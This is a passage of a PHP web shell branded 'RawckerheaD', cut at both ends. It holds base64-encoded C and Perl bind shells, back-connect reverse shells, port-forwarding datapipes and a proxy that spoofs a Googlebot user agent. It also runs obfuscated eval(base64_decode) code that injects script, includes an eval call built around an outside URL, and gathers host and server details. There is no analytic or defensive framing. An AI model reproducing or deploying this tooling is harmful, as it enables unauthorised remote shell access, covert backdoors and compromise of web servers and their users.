   GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
   b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
   pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
   NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
   ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
   ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
   7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
   9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
   2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
   dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
   lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
   $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
   VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
   JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
   TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
   lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
   Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
   Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
   lIENPTk47DQpleGl0IDA7DQp9DQp9";                                                 
   $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
   aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
   hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
   sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
   kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
   KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
   OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";                             
   $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
   BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
   SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
   KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
   sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
   Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
   QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
   Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
   $datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
   x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
   HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
   aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
   lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
   xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
   W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
   LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
   udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
   0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
   iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
   KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
   gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
   hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
   iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
   ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
   vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
   AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
   QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
   ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
   gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
   wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
   29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
   MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
   gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
   5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
   HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
   dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
   KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
   ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
   E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
   Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
   NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
   J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
   CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
   dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
   gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
   lsZSk7DQogIHJldHVybiAwOw0KfQ==";                                                
   $datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
   CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
   bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
   gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
   NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
   iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
   aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
   SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
   xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
   WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
   CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
   yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
   I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
   m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
   IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
   lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
   QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
   CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
   c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
   NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
   UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
   DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
   ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
   1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
   $prx_pl="IyF1c3IvYmluL3BlcmwKdXNlIFNvY2tldDsKbXkgJHBvcnQgPSAkQVJHVlswXXx8MzEzMzc7Cm15ICRwcm90b2NvbCA9IGdldHByb3RvYn
   luYW1lKCd0Y3AnKTsKbXkgJG15X2FkZHIgID0gc29ja2FkZHJfaW4gKCRwb3J0LCBJTkFERFJfQU5ZKTsKc29ja2V0IChTT0NLLCBBRl9JTkVULCBTT
   0NLX1NUUkVBTSwgJHByb3RvY29sKSBvciBkaWUgInNvY2tldCgpOiAkISI7CnNldHNvY2tvcHQgKFNPQ0ssIFNPTF9TT0NLRVQsIFNPX1JFVVNFQURE
   UiwxICkgb3IgZGllICJzZXRzb2Nrb3B0KCk6ICQhIjsKYmluZCAoU09DSywgJG15X2FkZHIpIG9yIGRpZSAiYmluZCgpOiAkISI7Cmxpc3RlbiAoU09
   DSywgU09NQVhDT05OKSBvciBkaWUgImxpc3RlbigpOiAkISI7CiRTSUd7J0lOVCd9ID0gc3ViIHsKY2xvc2UgKFNPQ0spOwpleGl0Owp9Owp3aGlsZS
   AoMSkgewpuZXh0IHVubGVzcyBteSAkcmVtb3RlX2FkZHIgPSBhY2NlcHQgKFNFU1NJT04sIFNPQ0spOwpteSAoJGZpc3QsICRtZXRob2QsICRyZW1vd
   GVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IGFuYWx5emVfcmVxdWVzdCgpOwppZihvcGVuX2Nvbm5lY3Rpb24gKFJFTU9URSwgJHJlbW90ZV9ob3N0LCAk
   cmVtb3RlX3BvcnQpID09IDApIHsKY2xvc2UgKFNFU1NJT04pOwpuZXh0Owp9CnByaW50IFJFTU9URSAkZmlyc3Q7CnByaW50IFJFTU9URSAiVXNlci1
   BZ2VudDogR29vZ2xlYm90LzIuMSAoK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbClcbiI7CndoaWxlICg8U0VTU0lPTj4pIHsKbmV4dCBpZi
   AoL1Byb3h5LUNvbm5lY3Rpb246LyB8fCAvVXNlci1BZ2VudDovKTsKcHJpbnQgUkVNT1RFICRfOwpsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvK
   TsKfQpwcmludCBSRU1PVEUgIlxuIjsKJGhlYWRlciA9IDE7CndoaWxlICg8UkVNT1RFPikgewpwcmludCBTRVNTSU9OICRfOwppZiAoJGhlYWRlcikg
   eyAgICAgCmlmICgkaGVhZGVyICYmICRfID1+IC9eW1xzXHgwMF0qJC8pIHsKJGhlYWRlciA9IDA7Cn0KfQp9CmNsb3NlIChSRU1PVEUpOwpjbG9zZSA
   oU0VTU0lPTik7Cn0KY2xvc2UgKFNPQ0spOwpzdWIgYW5hbHl6ZV9yZXF1ZXN0IHsKbXkgKCRmaXN0LCAkdXJsLCAkcmVtb3RlX2hvc3QsICRyZW1vdG
   VfcG9ydCwgJG1ldGhvZCk7CiRmaXJzdCA9IDxTRVNTSU9OPjsKJHVybCA9ICgkZmlyc3QgPX4gbXwoaHR0cDovL1xTKyl8KVswXTsKKCRtZXRob2QsI
   CRyZW1vdGVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IAooJGZpcnN0ID1+IG0hKEdFVCkgaHR0cDovLyhbXi86XSspOj8oXGQqKSEgKTsKaWYgKCEkcmVt
   b3RlX2hvc3QpIHsKY2xvc2UoU0VTU0lPTik7CmV4aXQ7Cn0KJHJlbW90ZV9wb3J0ID0gImh0dHAiIHVubGVzcyAoJHJlbW90ZV9wb3J0KTsKJGZpcnN
   0ID1+IHMvaHR0cDpcL1wvW15cL10rLy87CnJldHVybiAoJGZpcnN0LCAkbWV0aG9kLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7Cn0Kc3ViIG
   9wZW5fY29ubmVjdGlvbiB7Cm15ICgkaG9zdCwgJHBvcnQpID0gQF9bMSwyXTsKbXkgKCRkZXN0X2FkZHIsICRjdXIpOwppZiAoJHBvcnQgIX4gL15cZ
   CskLykgewokcG9ydCA9IChnZXRzZXJ2YnluYW1lKCRwb3J0LCAidGNwIikpWzJdOwokcG9ydCA9IDgwIHVubGVzcyAoJHBvcnQpOwp9CiRob3N0ID0g
   aW5ldF9hdG9uICgkaG9zdCkgb3IgcmV0dXJuIDA7CiRkZXN0X2FkZHIgPSBzb2NrYWRkcl9pbiAoJHBvcnQsICRob3N0KTsKc29ja2V0ICgkX1swXSw
   gQUZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90b2NvbCkgb3IgZGllICJzb2NrZXQoKSA6ICQhIjsKY29ubmVjdCAoJF9bMF0sICRkZXN0X2FkZHIpIG
   9yIHJldHVybiAwOwokY3VyID0gc2VsZWN0KCRfWzBdKTsgIAokfCA9IDE7CnNlbGVjdCgkY3VyKTsKcmV0dXJuIDE7Cn0=";
   $_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUoM241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3M
   CU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaSVvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3
   dSVlOSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU
   3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRC
   VhNyVhNyVvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVlOCVvQiVlOSVhQiVhQiVhOSU3dSVhQ
   iVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRCV1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1
   byVlRiVldSVlaSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiV
   hQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVhRSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOC
   U3dSVhOSVhOSVvQiU3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5Myo4RnV1Mm5zdG8ybm9re
   nMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaScpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZG
   UoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuI
   iciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));                                 
   if($unix)                                                                       
    {                                                                              
    if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
    if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
    if($safe_mode) { $sysctl = '-'; }                                              
    else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }           
    else                                                                           
     {                                                                             
      $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');           
      if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
      if(empty($sysctl)) { $sysctl = '-'; }                                        
      setcookie('sysctl',$sysctl);                                                 
     }                                                                             
    }echo $head;eval(gzinflate(str_rot13(base64_decode('http://xeyal.net'))));     
   echo '';                                                                 
   echo ''.ws(2).'!'.ws(2).'RawckerheaD '.$version.' ';
   echo ws(2)."".date ("d-m-Y H:i:s")." Your IP: [".gethostbyname($_SERVER["REMOTE_ADDR"])."]";
   if(isset($_SERVER['X_FORWARDED_FOR'])){echo " X_FORWARDED_FOR: [".$_SERVER['X_FORWARDED_FOR']."]";}
   if(isset($_SERVER['CLIENT_IP'])){echo " CLIENT_IP: [".$_SERVER['CLIENT_IP']."]";}
   echo " Server IP: [".gethostbyname($_SERVER["HTTP_HOST"])."]";
   echo "
";                                                                    
   echo ws(2)."PHP version: ".@phpversion()."";                             
   $curl_on = @function_exists('curl_version');                                    
   echo ws(2);                                                                     
   echo "cURL: ".(($curl_on)?("ON"):("OFF"));

   echo "".ws(2);                                                              
   echo "MySQL: ";                                                              

   $mysql_on = @function_exists('mysql_connect');                                  
   if($mysql_on){                                                                  
   echo "ON"; } else { echo "OFF"; }
   echo "".ws(2);                                                              
   echo "MSSQL: ";                                                              

